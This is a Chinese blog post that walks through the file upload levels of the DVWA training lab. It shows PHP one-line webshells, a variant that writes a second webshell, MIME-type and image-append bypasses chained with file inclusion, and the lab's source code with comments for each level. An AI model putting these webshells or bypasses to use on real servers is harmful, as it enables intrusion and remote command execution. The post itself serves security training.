dvwa 文件上传漏洞通关攻略

最新推荐文章于 2024-05-07 13:34:07 发布
最新推荐文章于 2024-05-07 13:34:07 发布
阅读量128 收藏
点赞数
分类专栏: 靶场 文章标签: web安全 dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/134448436
版权

dvwa 文件上传漏洞通关攻略

文章目录


练习文件上传漏洞的攻击与防御

low等级

在这里插入图片描述
点击文件上传进行测试上传个一句话木马

<?php
@eval($_REQUEST[777]);
 ?>

在这里插入图片描述
上传成功
在这里插入图片描述
访问上传路径
在这里插入图片描述
进行蚁剑连接
在这里插入图片描述

代码审计


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}

?>

直接将文件从缓存目录换到了hackable/uploads下没有做任何防御

medium

在这里插入图片描述
进行文件上传测试上传一句话木马文件
在这里插入图片描述
发现只能上传JPEG或者是PNG抓包进行重放进行黑盒测试
在这里插入图片描述
修改一下文件类型,忽悠一下系统
在这里插入图片描述
发现上传成功访问一下
在这里插入图片描述
用密码进行访问
在这里插入图片描述
代码审计


<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); //将上传的文件名和要保存的地址进行了拼接

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];   //取到了文件类型
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && //对文件类型进行过滤
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

可以看到就对上传的文件类型进行了过滤

high

在这里插入图片描述
上传文件进行测试
在这里插入图片描述
抓包进行重放
在这里插入图片描述
尝试修改一下文件类型
在这里插入图片描述
发现被过滤掉了修改一下后缀名
在这里插入图片描述
可以看到还是不行我们上传一张真图片测试一下这个上传图片的功能是否正常

在这里插入图片描述
发现上传成功了进入重发面板尝试在照片后面加个一句话木马
在这里插入图片描述
发现上传成功了
在这里插入图片描述
但是无法执行命令因为是尝试上传一个变形的一句话木马

<?php file_put_contents('yjh.php','<?php @eval($_REQUEST[666]) ?>')  ?>

在这里插入图片描述
利用文件包含漏洞执行图片里的php语句
在这里插入图片描述
可以看到图片以二进制的方式读出来,那么他就会在当前目录下生成一个yjh.php我们进行访问
在这里插入图片描述
用蚁剑进行连接
在这里插入图片描述
连接成功.
代码审计

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); //过滤后缀名
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&  //对图片后缀名进行过滤
        ( $uploaded_size < 100000 ) &&  
        getimagesize( $uploaded_tmp ) ) {  //检测图片信息但是getimagesize只检测头部

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

对文件的后缀名和文件头部的内容进行过滤

impossible

代码审计

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );  //检测token值防止重放


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);//获取后缀名
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext )  == 'png' ) && //将所有字符都转换成大小写进行过滤
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&//对文件类型进行过滤
        getimagesize( $uploaded_tmp ) ) {  //检测头部信息

        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp ); //进行二次渲染根据上传的图像再次创建一个图像
            imagepng( $img, $temp_file, 9);  //输入图像到浏览器
        }
        imagedestroy( $img ); //关闭资源

        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) { //进行重命名
            // Yes!
            echo "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }

        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

完全防御对token进行了判断对后缀名文件类型进行了检测又检测了头部信息对文件进行了二次渲染,又一次对文件进行重命名,最后过unlink是删除缓冲区的文件 unlink是有竞争条件漏洞的 只要在没来的及删除的情况一直发送包,文件就会被保存下来 但是在本次是无法突破的
想让绕过二次渲染需要将木马插入到头部
但是 getimagesize又是用来检测头部信息的,所以说做到了防御
但是这个防御也不是不能被绕过在检测头部和二次渲染之间有一段空白的区域是可以插入一句话木马的

抠脚大汉在网络
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
dvwa中的文件上传漏洞
无痕的博客
01-12 6528
dvwa漏洞环境演示文件上传漏洞
DVWA 文件上传通关攻略
qq_45953122的博客
08-29 450
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞
DVWA靶场之文件上传通关详解
qq_62169455的博客
06-27 1019
通过查看该等级的源码,可以看到该等级对上传的文件没有任何限制和过滤,存在明显的上传漏洞,成功上传后就会显示出路径+successfully uploaded 上传失败则会提示your image was not uploaded。然后访问dvwa文件中的uploads对应的文件位置D:\phpstudy_pro\phpstudy_pro\WWW\DVWA\hackable\uploads,就可以看到刚刚上传的muma.php已经上传成功。最后使用蚁剑连接,出现如图所示界面,到这里,medium就完成了。
DVWA通关攻略零到一【全】
WX公众号-小白学安全
10-28 3万+
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
DVWA通关攻略文件上传
勿山几已
05-22 1801
简要介绍文件上传漏洞及其利用
DVWA部分通关攻略(持续更新)
2301_80470992的博客
02-03 1108
先查看源码可以直接爆破,用burpsuit抓包随便输入一组用户名和密码。先把所有变量全部清除然后分别用字典使用爆破。先爆破用户名找到长度不同的部分,密码依照上述过程得到密码为password,用户名为admin。
DVWA靶机通关攻略第五关——文件上传
小飞飞的博客
03-11 883
DVWA靶机文件上传详细教学
DVWA全级别通关教程
热门推荐
weixin_52515588的博客
03-26 8万+
首先选择难度,我们从low开始,如上图所示进行修改 目录 SQL手工注入 过程: low Medium high Impossible SQL 盲注 过程: SQL 工具注入 工具安装过程: 过程: low Medium High: 暴力破解 过程: Low Medium High Impossible 命令注入 过程: Low Medium High: Impossible 文件上传 过程: Low Medium High Im...
dvwa——任意文件上传漏洞
GZY0601的博客
09-18 168
ok,前面把sql注入两个关卡最基本的通关方法给学了,这个文章我们来学任意文件上传漏洞,废话不多说,现在就开始!文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。其实今天应该先写的文件包含漏洞的,然后来讲文件上传的high会好点的,但是忘记了先写了,写到high才想起来,有点裂开,我们明天就来写文件包含漏洞吧。哈哈哈哈哈哈哈!好啦,以上内容为我个人理解,不喜勿喷,如有写错欢迎指出!
DVWA 共12关通关笔记
09-12
基本上都过来了。
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
PHP及DVWA文件包
07-28
PHP及DVWA文件包,内有phpstudy_x64_8.1.1.3及DVWA-master,DVWA解压可直接用。 DVWA页面登陆用户为root,密码为123456
综合运维管理平台:全面监控、智能告警,筑牢网络安全防线
最新发布
MXsoft618的博客
05-07 263
这种全面而细致的监控,使得管理员能够实时掌握网络中的每一个细节,从而确保网络环境的稳定性和安全性。我们相信,随着技术的不断进步和用户需求的不断变化,监控易将以其卓越的性能和灵活的操作方式,继续引领网络监控与管理的新潮流,为用户的网络安全保驾护航。无论是IP和网口的监控、定时扫描与异常告警,还是对交换机配置的实时监控与对比,都体现了监控易在网络安全管理方面的专业实力和创新精神。为了确保网络的顺畅运行,及时发现并解决潜在问题,监控易产品提供了强大的监控与告警功能,为用户的网络安全保驾护航。
专家解读 | NIST网络安全框架(1):框架概览
Enlink_Young的博客
05-06 934
当然,在实施CSF过程中,组织对层级的选择和设定也会影响框架配置文件。CSF框架核心由一组适合于各领域关键基础设施部门的网络安全活动、期望结果和参考信息构成,以一种通用的语言描述了适用的网络安全行业标准、指南和实践,以便使从管理层到实施/运营层的利益相关者,能够就网络安全活动和效能进行便捷有效的沟通和交流。CSF是结果驱动型的框架,并且不强制要求组织必须如何实现这些功能,具有不同预算的小型组织或大公司都能够以适合自己的方式实现CSF定义的安全成效,为实施网络安全计划的组织提供了充分的灵活性和扩展性。
「 网络安全常用术语解读 」SBOM主流格式CycloneDX详解
网络安全
05-03 1048
CycloneDX是软件供应链的现代标准。CycloneDX物料清单(BOM)可以表示软件、硬件、服务和其他类型资产的全栈库存。该规范由OWASP基金会发起并领导,由Ecma International标准化,并得到全球信息安全界的支持,如今CycloneDX已经是OWASP旗舰项目。
网络安全(黑客)—-2024自学手册
xv7676的博客
05-06 1544
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
dvwa文件包含漏洞通关
09-26
DVWA文件包含漏洞通关的过程如下: 1. 在DVWA页面左侧选择File Inclusion。 2. 将DVWA Security设置为High,这样会使用文件名匹配,并且只允许以file开始的文件名,或者include.php,但是可以绕过这个限制。 3. 利用文件包含漏洞,读取../hackable/flags/fi.php内的五句话。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值